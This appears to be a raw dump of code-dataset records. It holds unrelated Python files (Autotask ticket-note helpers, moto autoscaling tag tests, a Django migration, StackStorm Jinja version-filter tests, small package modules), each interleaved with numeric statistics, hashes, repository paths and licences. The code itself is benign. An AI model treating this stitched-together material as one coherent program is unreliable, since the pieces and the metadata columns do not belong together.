get_ticket_notes_at(id_=[0]): """ Returns all notes, belonging to the tickets from the given list. Parameters: id_ [list]: list of Autotask ticket ids at [Autotask connect object] : Autotask atws.connect object Returns: Tuple: (Python DataFrame, list of notes) """ query_notes=atws.Query('TicketNote') # query_notes.WHERE('NoteType',query_notes.Equals,3) # query.open_bracket('AND') query_notes.open_bracket('AND') if len(id_)==1: query_notes.WHERE('TicketID',query_notes.Equals,id_[0]) else: query_notes.WHERE('TicketID',query_notes.Equals,id_[0]) for element in id_[1:]: query_notes.OR('TicketID',query_notes.Equals,element) query_notes.close_bracket() query_notes.open_bracket('AND') query_notes.AND('NoteType',query_notes.NotEqual,13) query_notes.AND('Publish',query_notes.Equals,1) query_notes.close_bracket() notes = at.query(query_notes).fetch_all() df = pd.DataFrame([dict(note) for note in notes]) return df,notes def make_note_in_at(title='Title',descr='Long description 3200 chars',note_type=6,ticket_id=0): note = at.new('TicketNote') note.Title = title note.Description = descr note.NoteType = 3 note.TicketID= ticket_id note.Publish = 1 note.create() return note
26.549618
111
0.655549
472
3,478
4.612288
0.180085
0.220487
0.110243
0.035829
0.797887
0.779972
0.779972
0.766651
0.741387
0.741387
0
0.011778
0.218804
3,478
130
112
26.753846
0.789474
0.39333
0
0.625
0
0
0.06601
0
0
0
0
0
0
1
0.0625
false
0
0.104167
0
0.229167
0
0
0
0
null
1
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
6130cc50694ef58a70bf10e8251c3249311e9e85
168
py
Python
courses/python/cursoemvideo/exercicios/ex107_112/main.py
bdpcampos/public
dda57c265718f3e1cc0d6bce73f149051f5647ef
[ "MIT" ]
3
2020-04-28T01:42:09.000Z
2020-05-03T12:05:23.000Z
courses/python/cursoemvideo/exercicios/ex107_112/main.py
bdpcampos/public
dda57c265718f3e1cc0d6bce73f149051f5647ef
[ "MIT" ]
null
null
null
courses/python/cursoemvideo/exercicios/ex107_112/main.py
bdpcampos/public
dda57c265718f3e1cc0d6bce73f149051f5647ef
[ "MIT" ]
null
null
null
from exercicios.ex107_112.moeda import moeda from exercicios.ex107_112.dado import validacao p = validacao.leiaDinheiro('Digite o preço: R$') moeda.resumo(p, 80, 35)
24
48
0.785714
26
168
5
0.653846
0.215385
0.292308
0.338462
0
0
0
0
0
0
0
0.107383
0.113095
168
7
49
24
0.765101
0
0
0
0
0
0.106509
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
6
61bf92ec1a6e3287a1fb9172ae186a9aebd9900e
230
py
Python
src/common/env.py
x-blood/absolutely-stop-aws-instances
11be070c2ebcbf7499220842c6168b8cb70327b9
[ "Apache-2.0" ]
null
null
null
src/common/env.py
x-blood/absolutely-stop-aws-instances
11be070c2ebcbf7499220842c6168b8cb70327b9
[ "Apache-2.0" ]
null
null
null
src/common/env.py
x-blood/absolutely-stop-aws-instances
11be070c2ebcbf7499220842c6168b8cb70327b9
[ "Apache-2.0" ]
null
null
null
import os def get_slack_channel_id(): return os.environ['SLACK_CHANNEL_ID'] def get_slack_web_hook_url(): return os.environ['SLACK_WEB_HOOK_URL'] def get_aws_account_name(): return os.environ['AWS_ACCOUNT_NAME']
16.428571
43
0.756522
37
230
4.243243
0.405405
0.11465
0.286624
0.254777
0
0
0
0
0
0
0
0
0.13913
230
13
44
17.692308
0.792929
0
0
0
0
0
0.217391
0
0
0
0
0
0
1
0.428571
true
0
0.142857
0.428571
1
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
0
1
1
0
0
6
f61bee361b7dc06c2cf52939ece202d18dade259
8,692
py
Python
tests/test_autoscaling/test_autoscaling_tags.py
symroe/moto
4e106995af6f2820273528fca8a4e9ee288690a5
[ "Apache-2.0" ]
5,460
2015-01-01T01:11:17.000Z
2022-03-31T23:45:38.000Z
tests/test_autoscaling/test_autoscaling_tags.py
symroe/moto
4e106995af6f2820273528fca8a4e9ee288690a5
[ "Apache-2.0" ]
4,475
2015-01-05T19:37:30.000Z
2022-03-31T13:55:12.000Z
tests/test_autoscaling/test_autoscaling_tags.py
symroe/moto
4e106995af6f2820273528fca8a4e9ee288690a5
[ "Apache-2.0" ]
1,831
2015-01-14T00:00:44.000Z
2022-03-31T20:30:04.000Z
import boto3 from moto import mock_autoscaling, mock_ec2 from .utils import setup_networking from tests import EXAMPLE_AMI_ID @mock_autoscaling def test_autoscaling_tags_update(): mocked_networking = setup_networking() client = boto3.client("autoscaling", region_name="us-east-1") _ = client.create_launch_configuration( LaunchConfigurationName="test_launch_configuration", ImageId=EXAMPLE_AMI_ID, InstanceType="t2.medium", ) _ = client.create_auto_scaling_group( AutoScalingGroupName="test_asg", LaunchConfigurationName="test_launch_configuration", MinSize=0, MaxSize=20, DesiredCapacity=5, Tags=[ { "ResourceId": "test_asg", "Key": "test_key", "Value": "test_value", "PropagateAtLaunch": True, } ], VPCZoneIdentifier=mocked_networking["subnet1"], ) client.create_or_update_tags( Tags=[ { "ResourceId": "test_asg", "Key": "test_key", "Value": "updated_test_value", "PropagateAtLaunch": True, }, { "ResourceId": "test_asg", "Key": "test_key2", "Value": "test_value2", "PropagateAtLaunch": False, }, ] ) response = client.describe_auto_scaling_groups(AutoScalingGroupNames=["test_asg"]) response["AutoScalingGroups"][0]["Tags"].should.have.length_of(2) @mock_autoscaling @mock_ec2 def test_delete_tags_by_key(): mocked_networking = setup_networking() client = boto3.client("autoscaling", region_name="us-east-1") client.create_launch_configuration( LaunchConfigurationName="TestLC", ImageId=EXAMPLE_AMI_ID, InstanceType="t2.medium", ) tag_to_delete = { "ResourceId": "tag_test_asg", "ResourceType": "auto-scaling-group", "PropagateAtLaunch": True, "Key": "TestDeleteTagKey1", "Value": "TestTagValue1", } tag_to_keep = { "ResourceId": "tag_test_asg", "ResourceType": "auto-scaling-group", "PropagateAtLaunch": True, "Key": "TestTagKey1", "Value": "TestTagValue1", } client.create_auto_scaling_group( AutoScalingGroupName="tag_test_asg", MinSize=1, MaxSize=2, LaunchConfigurationName="TestLC", Tags=[tag_to_delete, tag_to_keep], VPCZoneIdentifier=mocked_networking["subnet1"], ) client.delete_tags( Tags=[ { "ResourceId": "tag_test_asg", "ResourceType": "auto-scaling-group", "PropagateAtLaunch": True, "Key": "TestDeleteTagKey1", } ] ) response = client.describe_auto_scaling_groups( AutoScalingGroupNames=["tag_test_asg"] ) group = response["AutoScalingGroups"][0] tags = group["Tags"] tags.should.contain(tag_to_keep) tags.should_not.contain(tag_to_delete) @mock_autoscaling def test_describe_tags_without_resources(): client = boto3.client("autoscaling", region_name="us-east-2") resp = client.describe_tags() resp.should.have.key("Tags").equals([]) resp.shouldnt.have.key("NextToken") @mock_autoscaling def test_describe_tags_no_filter(): subnet = setup_networking()["subnet1"] client = boto3.client("autoscaling", region_name="us-east-1") create_asgs(client, subnet) response = client.describe_tags() response.should.have.key("Tags").length_of(4) response["Tags"].should.contain( { "ResourceId": "test_asg", "ResourceType": "auto-scaling-group", "Key": "test_key", "Value": "updated_test_value", "PropagateAtLaunch": True, } ) response["Tags"].should.contain( { "ResourceId": "test_asg", "ResourceType": "auto-scaling-group", "Key": "test_key2", "Value": "test_value2", "PropagateAtLaunch": False, } ) response["Tags"].should.contain( { "ResourceId": "test_asg2", "ResourceType": "auto-scaling-group", "Key": "asg2tag1", "Value": "val", "PropagateAtLaunch": False, } ) response["Tags"].should.contain( { "ResourceId": "test_asg2", "ResourceType": "auto-scaling-group", "Key": "asg2tag2", "Value": "diff", "PropagateAtLaunch": False, } ) @mock_autoscaling def test_describe_tags_filter_by_name(): subnet = setup_networking()["subnet1"] client = boto3.client("autoscaling", region_name="us-east-1") create_asgs(client, subnet) response = client.describe_tags( Filters=[{"Name": "auto-scaling-group", "Values": ["test_asg"]}] ) response.should.have.key("Tags").length_of(2) response["Tags"].should.contain( { "ResourceId": "test_asg", "ResourceType": "auto-scaling-group", "Key": "test_key", "Value": "updated_test_value", "PropagateAtLaunch": True, } ) response["Tags"].should.contain( { "ResourceId": "test_asg", "ResourceType": "auto-scaling-group", "Key": "test_key2", "Value": "test_value2", "PropagateAtLaunch": False, } ) response = client.describe_tags( Filters=[{"Name": "auto-scaling-group", "Values": ["test_asg", "test_asg2"]}] ) response.should.have.key("Tags").length_of(4) response["Tags"].should.contain( { "ResourceId": "test_asg", "ResourceType": "auto-scaling-group", "Key": "test_key", "Value": "updated_test_value", "PropagateAtLaunch": True, } ) response["Tags"].should.contain( { "ResourceId": "test_asg", "ResourceType": "auto-scaling-group", "Key": "test_key2", "Value": "test_value2", "PropagateAtLaunch": False, } ) response["Tags"].should.contain( { "ResourceId": "test_asg2", "ResourceType": "auto-scaling-group", "Key": "asg2tag1", "Value": "val", "PropagateAtLaunch": False, } ) response["Tags"].should.contain( { "ResourceId": "test_asg2", "ResourceType": "auto-scaling-group", "Key": "asg2tag2", "Value": "diff", "PropagateAtLaunch": False, } ) @mock_autoscaling def test_describe_tags_filter_by_propgateatlaunch(): subnet = setup_networking()["subnet1"] client = boto3.client("autoscaling", region_name="us-east-1") create_asgs(client, subnet) response = client.describe_tags( Filters=[{"Name": "propagate-at-launch", "Values": ["True"]}] ) response.should.have.key("Tags").length_of(1) response["Tags"].should.contain( { "ResourceId": "test_asg", "ResourceType": "auto-scaling-group", "Key": "test_key", "Value": "updated_test_value", "PropagateAtLaunch": True, } ) def create_asgs(client, subnet): _ = client.create_launch_configuration( LaunchConfigurationName="test_launch_configuration", ImageId=EXAMPLE_AMI_ID, InstanceType="t2.medium", ) client.create_auto_scaling_group( AutoScalingGroupName="test_asg", LaunchConfigurationName="test_launch_configuration", MinSize=0, MaxSize=20, DesiredCapacity=5, VPCZoneIdentifier=subnet, ) client.create_auto_scaling_group( AutoScalingGroupName="test_asg2", LaunchConfigurationName="test_launch_configuration", MinSize=0, MaxSize=20, DesiredCapacity=5, Tags=[ {"Key": "asg2tag1", "Value": "val"}, {"Key": "asg2tag2", "Value": "diff"}, ], VPCZoneIdentifier=subnet, ) client.create_or_update_tags( Tags=[ { "ResourceId": "test_asg", "Key": "test_key", "Value": "updated_test_value", "PropagateAtLaunch": True, }, { "ResourceId": "test_asg", "Key": "test_key2", "Value": "test_value2", "PropagateAtLaunch": False, }, ] )
29.364865
86
0.55971
763
8,692
6.124509
0.129751
0.051787
0.068478
0.083886
0.823026
0.804622
0.779799
0.72523
0.708966
0.708966
0
0.012746
0.304993
8,692
295
87
29.464407
0.760801
0
0
0.602941
0
0
0.262655
0.014381
0
0
0
0
0
1
0.025735
false
0
0.014706
0
0.040441
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
f632b07435f03ba4c3f143216b2e2f85b74eeae5
38
py
Python
deepnlpf/__init__.py
deepnlpf/deepnlpf
6508ab1e8fd395575d606ee20223f25591541e25
[ "Apache-2.0" ]
3
2020-04-11T14:12:45.000Z
2020-05-30T16:31:06.000Z
deepnlpf/__init__.py
deepnlpf/deepnlpf
6508ab1e8fd395575d606ee20223f25591541e25
[ "Apache-2.0" ]
34
2020-03-20T19:36:40.000Z
2022-03-20T13:00:32.000Z
deepnlpf/__init__.py
deepnlpf/deepnlpf
6508ab1e8fd395575d606ee20223f25591541e25
[ "Apache-2.0" ]
1
2020-09-05T06:44:15.000Z
2020-09-05T06:44:15.000Z
from deepnlpf.pipeline import Pipeline
38
38
0.894737
5
38
6.8
0.8
0
0
0
0
0
0
0
0
0
0
0
0.078947
38
1
38
38
0.971429
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
f63495b925accbf028603acee9766da20e3c0074
80
py
Python
metasearch/__init__.py
suzanagi/materials-researchactivity-uoa-2020-public-metasearch-mosaicsearch_publication
37553698e6f778b313922dca23c4ed40530d8f31
[ "MIT" ]
null
null
null
metasearch/__init__.py
suzanagi/materials-researchactivity-uoa-2020-public-metasearch-mosaicsearch_publication
37553698e6f778b313922dca23c4ed40530d8f31
[ "MIT" ]
null
null
null
metasearch/__init__.py
suzanagi/materials-researchactivity-uoa-2020-public-metasearch-mosaicsearch_publication
37553698e6f778b313922dca23c4ed40530d8f31
[ "MIT" ]
null
null
null
from metasearch.models import ResultItem # Tests from metasearch.tests import *
20
40
0.825
10
80
6.6
0.6
0.424242
0
0
0
0
0
0
0
0
0
0
0.125
80
4
41
20
0.942857
0.0625
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
f63fe8f193376559dd3cc9a126e820175b4ba446
64
py
Python
ctf/print_N_581_times.py
inflatus/python
bc87e2ca9f40c0e53c0d6e15e364cb7dff1c6fc0
[ "MIT" ]
null
null
null
ctf/print_N_581_times.py
inflatus/python
bc87e2ca9f40c0e53c0d6e15e364cb7dff1c6fc0
[ "MIT" ]
7
2021-02-08T20:43:38.000Z
2022-03-12T00:17:16.000Z
ctf/print_N_581_times.py
inflatus/python
bc87e2ca9f40c0e53c0d6e15e364cb7dff1c6fc0
[ "MIT" ]
null
null
null
# print N 581 times # need to be followed by a 4 print 'N'*581
12.8
28
0.671875
14
64
3.071429
0.785714
0.27907
0.418605
0
0
0
0
0
0
0
0
0.145833
0.25
64
4
29
16
0.75
0.6875
0
0
0
0
0.058824
0
0
0
0
0
0
0
null
null
0
0
null
null
1
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
1
0
6
f674e8d226841f5c9d937a826aec4f5eabf244c7
172
py
Python
common/__init__.py
jkulhanek/rl-baselines-tensorflow
38726b5f2e89d56d8172a5fcc24cb4697112482e
[ "MIT" ]
null
null
null
common/__init__.py
jkulhanek/rl-baselines-tensorflow
38726b5f2e89d56d8172a5fcc24cb4697112482e
[ "MIT" ]
null
null
null
common/__init__.py
jkulhanek/rl-baselines-tensorflow
38726b5f2e89d56d8172a5fcc24cb4697112482e
[ "MIT" ]
null
null
null
from common.registry import register_trainer, make_trainer, register_agent, make_agent from common.core import AbstractAgent from common.train_wrappers import MetricContext
57.333333
86
0.883721
23
172
6.391304
0.565217
0.204082
0
0
0
0
0
0
0
0
0
0
0.081395
172
3
87
57.333333
0.93038
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
f6759e9e31e1072183c78bcbdb33102bed896643
6,125
py
Python
truffe2/units/migrations/0003_auto_20210210_1832.py
TeoGoddet/truffe2
23a963d404e5f719c0eeb273f52223ff5e3e5263
[ "BSD-2-Clause" ]
null
null
null
truffe2/units/migrations/0003_auto_20210210_1832.py
TeoGoddet/truffe2
23a963d404e5f719c0eeb273f52223ff5e3e5263
[ "BSD-2-Clause" ]
null
null
null
truffe2/units/migrations/0003_auto_20210210_1832.py
TeoGoddet/truffe2
23a963d404e5f719c0eeb273f52223ff5e3e5263
[ "BSD-2-Clause" ]
null
null
null
# Generated by Django 2.2.18 on 2021-02-10 17:32 from django.conf import settings from django.db import migrations, models import django.db.models.deletion import multiselectfield.db.fields class Migration(migrations.Migration): dependencies = [ ('units', '0002_auto_20201104_1648'), ] operations = [ migrations.AlterField( model_name='accessdelegation', name='access', field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('PRESIDENCE', 'Présidence'), ('TRESORERIE', 'Trésorerie'), ('COMMUNICATION', 'Communication'), ('INFORMATIQUE', 'Informatique'), ('ACCREDITATION', 'Accréditations'), ('LOGISTIQUE', 'Logistique'), ('SECRETARIAT', 'Secrétariat'), ('COMMISSIONS', 'Commissions')], max_length=97, null=True), ), migrations.AlterField( model_name='accessdelegation', name='role', field=models.ForeignKey(blank=True, help_text='(Optionnel !) Le rôle concerné.', null=True, on_delete=django.db.models.deletion.CASCADE, to='units.Role'), ), migrations.AlterField( model_name='accessdelegation', name='user', field=models.ForeignKey(blank=True, help_text="(Optionnel !) L'utilisateur concerné. L'utilisateur doit disposer d'une accréditation dans l'unité.", null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='accessdelegationlogging', name='what', field=models.CharField(choices=[('imported', 'Importé depuis Truffe 1'), ('created', 'Creation'), ('edited', 'Edité'), ('deleted', 'Supprimé'), ('restored', 'Restauré'), ('state_changed', 'Statut changé'), ('file_added', 'Fichier ajouté'), ('file_removed', 'Fichier supprimé')], max_length=64), ), migrations.AlterField( model_name='accessdelegationlogging', name='who', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='accessdelegationviews', name='who', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='accreditation', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='accreditationlog', name='type', field=models.CharField(choices=[('created', 'Créée'), ('edited', 'Modifiée'), ('deleted', 'Supprimée'), ('autodeleted', 'Supprimée automatiquement'), ('renewed', 'Renouvelée'), ('validated', 'Validée'), ('autocreated', 'Créée automatiquement')], max_length=32), ), migrations.AlterField( model_name='accreditationlog', name='who', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='role', name='access', field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('PRESIDENCE', 'Présidence'), ('TRESORERIE', 'Trésorerie'), ('COMMUNICATION', 'Communication'), ('INFORMATIQUE', 'Informatique'), ('ACCREDITATION', 'Accréditations'), ('LOGISTIQUE', 'Logistique'), ('SECRETARIAT', 'Secrétariat'), ('COMMISSIONS', 'Commissions')], max_length=97, null=True), ), migrations.AlterField( model_name='role', name='name', field=models.CharField(default='---', max_length=255), ), migrations.AlterField( model_name='rolelogging', name='what', field=models.CharField(choices=[('imported', 'Importé depuis Truffe 1'), ('created', 'Creation'), ('edited', 'Edité'), ('deleted', 'Supprimé'), ('restored', 'Restauré'), ('state_changed', 'Statut changé'), ('file_added', 'Fichier ajouté'), ('file_removed', 'Fichier supprimé')], max_length=64), ), migrations.AlterField( model_name='rolelogging', name='who', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='roleviews', name='who', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='unit', name='name', field=models.CharField(default='---', max_length=255), ), migrations.AlterField( model_name='unit', name='parent_hierarchique', field=models.ForeignKey(blank=True, help_text="Pour les commissions et les équipes, sélectionner le comité de l'AGEPoly. Pour les sous-commisions, sélectionner la commission parente. Pour un coaching de section, sélectionner la commission Coaching. Pour le comité de l'AGEPoly, ne rien mettre.", null=True, on_delete=django.db.models.deletion.CASCADE, to='units.Unit'), ), migrations.AlterField( model_name='unitlogging', name='what', field=models.CharField(choices=[('imported', 'Importé depuis Truffe 1'), ('created', 'Creation'), ('edited', 'Edité'), ('deleted', 'Supprimé'), ('restored', 'Restauré'), ('state_changed', 'Statut changé'), ('file_added', 'Fichier ajouté'), ('file_removed', 'Fichier supprimé')], max_length=64), ), migrations.AlterField( model_name='unitlogging', name='who', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), migrations.AlterField( model_name='unitviews', name='who', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL), ), ]
54.6875
381
0.631673
603
6,125
6.296849
0.240464
0.100079
0.125099
0.145115
0.802476
0.789834
0.706084
0.696076
0.671319
0.671319
0
0.01106
0.217633
6,125
111
382
55.18018
0.781302
0.00751
0
0.8
1
0.019048
0.289452
0.01481
0
0
0
0
0
1
0
false
0
0.066667
0
0.095238
0
0
0
0
null
0
0
0
1
1
1
0
0
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
9cb0591f499436797cf13b46c2815efe3cbdf3a7
117
py
Python
scripts/_mp_sum.py
lilleswing/SynNet
635af44d0cfe2a2015814001a3b1c809128b238a
[ "MIT" ]
14
2021-10-18T06:56:49.000Z
2022-03-01T01:32:10.000Z
scripts/_mp_sum.py
lilleswing/SynNet
635af44d0cfe2a2015814001a3b1c809128b238a
[ "MIT" ]
3
2021-10-19T20:58:09.000Z
2022-02-07T18:02:04.000Z
scripts/_mp_sum.py
lilleswing/SynNet
635af44d0cfe2a2015814001a3b1c809128b238a
[ "MIT" ]
4
2021-10-20T03:02:59.000Z
2022-01-25T22:12:47.000Z
""" Computes the sum of a single molecular embedding. """ import numpy as np def func(emb): return np.sum(emb)
13
49
0.683761
19
117
4.210526
0.842105
0
0
0
0
0
0
0
0
0
0
0
0.205128
117
8
50
14.625
0.860215
0.418803
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0.333333
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
6
9cbacd7dcbeea8ce566d9f08b2e0008d0eca7eed
5,870
py
Python
st2common/tests/unit/test_jinja_render_version_filters.py
kkkanil/st2
07cd195d7a6e177a37dd019e5c9ab8329259d0fa
[ "Apache-2.0" ]
null
null
null
st2common/tests/unit/test_jinja_render_version_filters.py
kkkanil/st2
07cd195d7a6e177a37dd019e5c9ab8329259d0fa
[ "Apache-2.0" ]
15
2021-02-11T22:58:54.000Z
2021-08-06T18:03:47.000Z
st2common/tests/unit/test_jinja_render_version_filters.py
kkkanil/st2
07cd195d7a6e177a37dd019e5c9ab8329259d0fa
[ "Apache-2.0" ]
1
2021-07-10T15:02:29.000Z
2021-07-10T15:02:29.000Z
# Copyright 2020 The StackStorm Authors. # Copyright 2019 Extreme Networks, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import import unittest2 from st2common.util import jinja as jinja_utils class JinjaUtilsVersionsFilterTestCase(unittest2.TestCase): def test_version_compare(self): env = jinja_utils.get_jinja_environment() template = '{{version | version_compare("0.10.0")}}' actual = env.from_string(template).render({'version': '0.9.0'}) expected = '-1' self.assertEqual(actual, expected) template = '{{version | version_compare("0.10.0")}}' actual = env.from_string(template).render({'version': '0.10.1'}) expected = '1' self.assertEqual(actual, expected) template = '{{version | version_compare("0.10.0")}}' actual = env.from_string(template).render({'version': '0.10.0'}) expected = '0' self.assertEqual(actual, expected) def test_version_more_than(self): env = jinja_utils.get_jinja_environment() template = '{{version | version_more_than("0.10.0")}}' actual = env.from_string(template).render({'version': '0.9.0'}) expected = 'False' self.assertEqual(actual, expected) template = '{{version | version_more_than("0.10.0")}}' actual = env.from_string(template).render({'version': '0.10.1'}) expected = 'True' self.assertEqual(actual, expected) template = '{{version | version_more_than("0.10.0")}}' actual = env.from_string(template).render({'version': '0.10.0'}) expected = 'False' self.assertEqual(actual, expected) def test_version_less_than(self): env = jinja_utils.get_jinja_environment() template = '{{version | version_less_than("0.10.0")}}' actual = env.from_string(template).render({'version': '0.9.0'}) expected = 'True' self.assertEqual(actual, expected) template = '{{version | version_less_than("0.10.0")}}' actual = env.from_string(template).render({'version': '0.10.1'}) expected = 'False' self.assertEqual(actual, expected) template = '{{version | version_less_than("0.10.0")}}' actual = env.from_string(template).render({'version': '0.10.0'}) expected = 'False' self.assertEqual(actual, expected) def test_version_equal(self): env = jinja_utils.get_jinja_environment() template = '{{version | version_equal("0.10.0")}}' actual = env.from_string(template).render({'version': '0.9.0'}) expected = 'False' self.assertEqual(actual, expected) template = '{{version | version_equal("0.10.0")}}' actual = env.from_string(template).render({'version': '0.10.1'}) expected = 'False' self.assertEqual(actual, expected) template = '{{version | version_equal("0.10.0")}}' actual = env.from_string(template).render({'version': '0.10.0'}) expected = 'True' self.assertEqual(actual, expected) def test_version_match(self): env = jinja_utils.get_jinja_environment() template = '{{version | version_match(">0.10.0")}}' actual = env.from_string(template).render({'version': '0.10.1'}) expected = 'True' self.assertEqual(actual, expected) actual = env.from_string(template).render({'version': '0.1.1'}) expected = 'False' self.assertEqual(actual, expected) template = '{{version | version_match("<0.10.0")}}' actual = env.from_string(template).render({'version': '0.1.0'}) expected = 'True' self.assertEqual(actual, expected) actual = env.from_string(template).render({'version': '1.1.0'}) expected = 'False' self.assertEqual(actual, expected) template = '{{version | version_match("==0.10.0")}}' actual = env.from_string(template).render({'version': '0.10.0'}) expected = 'True' self.assertEqual(actual, expected) actual = env.from_string(template).render({'version': '0.10.1'}) expected = 'False' self.assertEqual(actual, expected) def test_version_bump_major(self): env = jinja_utils.get_jinja_environment() template = '{{version | version_bump_major}}' actual = env.from_string(template).render({'version': '0.10.1'}) expected = '1.0.0' self.assertEqual(actual, expected) def test_version_bump_minor(self): env = jinja_utils.get_jinja_environment() template = '{{version | version_bump_minor}}' actual = env.from_string(template).render({'version': '0.10.1'}) expected = '0.11.0' self.assertEqual(actual, expected) def test_version_bump_patch(self): env = jinja_utils.get_jinja_environment() template = '{{version | version_bump_patch}}' actual = env.from_string(template).render({'version': '0.10.1'}) expected = '0.10.2' self.assertEqual(actual, expected) def test_version_strip_patch(self): env = jinja_utils.get_jinja_environment() template = '{{version | version_strip_patch}}' actual = env.from_string(template).render({'version': '0.10.1'}) expected = '0.10' self.assertEqual(actual, expected)
37.870968
74
0.634072
710
5,870
5.090141
0.152113
0.026563
0.079137
0.115661
0.799945
0.799945
0.799945
0.784173
0.770891
0.738794
0
0.037682
0.217888
5,870
154
75
38.116883
0.74951
0.101874
0
0.719626
0
0
0.207533
0.081796
0
0
0
0
0.205607
1
0.084112
false
0
0.028037
0
0.121495
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
9cc7aefd30ad4120cedbb83f445eb6ceb68e930c
173
py
Python
mdp_extras/envs/__init__.py
aaronsnoswell/mdp-extras
58e544d7d6c8ef5ecc954647f35299af3e57a748
[ "MIT" ]
1
2021-11-18T02:28:17.000Z
2021-11-18T02:28:17.000Z
mdp_extras/envs/__init__.py
aaronsnoswell/mdp-extras
58e544d7d6c8ef5ecc954647f35299af3e57a748
[ "MIT" ]
null
null
null
mdp_extras/envs/__init__.py
aaronsnoswell/mdp-extras
58e544d7d6c8ef5ecc954647f35299af3e57a748
[ "MIT" ]
1
2021-05-30T14:26:45.000Z
2021-05-30T14:26:45.000Z
"""Move imports to module level for convenience""" from .nchain import * from .frozen_lake import * from .taxi import * from .mountain_car import * from .pendulum import *
21.625
50
0.745665
24
173
5.291667
0.666667
0.314961
0
0
0
0
0
0
0
0
0
0
0.16185
173
7
51
24.714286
0.875862
0.254335
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
141c285eb097db4e7c9df33763e803922a146d0f
81
py
Python
CodeWars/7 Kyu/Sort by Example.py
anubhab-code/Competitive-Programming
de28cb7d44044b9e7d8bdb475da61e37c018ac35
[ "MIT" ]
null
null
null
CodeWars/7 Kyu/Sort by Example.py
anubhab-code/Competitive-Programming
de28cb7d44044b9e7d8bdb475da61e37c018ac35
[ "MIT" ]
null
null
null
CodeWars/7 Kyu/Sort by Example.py
anubhab-code/Competitive-Programming
de28cb7d44044b9e7d8bdb475da61e37c018ac35
[ "MIT" ]
null
null
null
def example_sort(arr, example_arr): return sorted(arr, key=example_arr.index)
40.5
45
0.777778
13
81
4.615385
0.615385
0.333333
0
0
0
0
0
0
0
0
0
0
0.111111
81
2
45
40.5
0.833333
0
0
0
0
0
0
0
0
0
0
0
0
1
0.5
false
0
0
0.5
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
6
145999f4d386cd277a6aaef3a3a3bb67f18dc1cc
149
py
Python
app/models/__init__.py
oq-Yuki-po/PaperLibrary
2b86da52af08b487c78d1f9007cb9c02bc160235
[ "MIT" ]
null
null
null
app/models/__init__.py
oq-Yuki-po/PaperLibrary
2b86da52af08b487c78d1f9007cb9c02bc160235
[ "MIT" ]
null
null
null
app/models/__init__.py
oq-Yuki-po/PaperLibrary
2b86da52af08b487c78d1f9007cb9c02bc160235
[ "MIT" ]
null
null
null
